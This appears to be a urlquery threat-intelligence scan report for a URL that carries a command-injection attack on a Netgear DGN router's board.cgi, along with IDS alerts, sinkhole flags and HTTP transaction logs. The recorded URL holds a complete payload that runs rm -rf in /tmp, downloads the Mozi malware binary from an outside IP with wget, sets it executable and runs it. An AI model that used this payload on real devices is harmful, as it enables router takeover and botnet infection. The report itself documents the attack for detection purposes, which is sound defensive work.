Report Overview
Visitedpublic
2025-02-06 18:07:39
Tags
Submit Tags
URL
192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron
Finishing URL
192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron
IP / ASN
192.91.173.138
#6075 LM-CORP
Title
Internet Security by Zscaler

Detections

urlquery
0
Network Intrusion Detection
4
Threat Detection Systems
6

Host Summary

HostRankRegisteredFirst SeenLast Seen
192.91.173.138
unknownunknownNo dataNo data
login.zscalerthree.net
463182012-10-042018-02-182024-05-07

Related reports

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

SeveritySource IPDestination IPAlert
highClient IP
192.91.173.138
ET HUNTING Suspicious Chmod Usage in URI (Outbound)
highClient IP
193.137.200.189
ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
highClient IP
193.137.200.189
ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound
highClient IP
220.130.167.33
ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound

Threat Detection Systems

Public InfoSec YARA rules

No alerts detected


OpenPhish

No alerts detected


PhishTank

No alerts detected


Quad9 DNS
SeverityIndicatorAlert
medium192.91.173.138Sinkholed
medium192.91.173.138Sinkholed
medium192.91.173.138Sinkholed

ThreatFox

No alerts detected


JavaScript (1)

HTTP Transactions (4)

URLIPResponseSize
GET 192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron
192.91.173.138403 Forbidden14 kB
GET login.zscalerthree.net/img_logo_new1.png
165.225.73.181200 OK4.4 kB
GET 192.91.173.138/favicon.ico
192.91.173.138403 Forbidden14 kB
GET 192.91.173.138/board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://117.209.23.217:52647/mozi.a;chmod+777+mozi.a;/tmp/mozi.a+varcron
0.0.0.0 0 B